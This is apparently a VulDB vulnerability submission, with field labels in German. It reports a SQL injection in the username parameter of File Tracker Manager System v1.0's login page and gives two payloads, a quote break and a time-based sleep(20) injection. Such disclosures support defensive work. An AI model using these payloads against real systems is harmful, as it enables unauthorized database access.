| Titel | File Tracker Manager System v1.0 /file_manager/login.php post parameter username exists SQL injection vulnerability |
|---|
| Beschreibung | An issue was discovered in File Tracker Manager System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /file_manager/login.php post parameter username.
Payload1: username=a'&password=b
Payload2:username=a' and (select 1 from (select(sleep(20)))a)-- a&password=b |
|---|
| Quelle | ⚠️ https://github.com/godownio/bug_report/blob/main/vendors/hemedy99/File%20Tracker%20Manager%20System/SQLi-1.md |
|---|
| Benutzer | godownio (UID 42581) |
|---|
| Einreichung | 09.03.2023 07:02 (vor 3 Jahren) |
|---|
| Moderieren | 09.03.2023 15:39 (9 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 222648 [SourceCodester File Tracker Manager System 1.0 POST Parameter /file_manager/login.php Benutzername SQL Injection] |
|---|
| Punkte | 19 |
|---|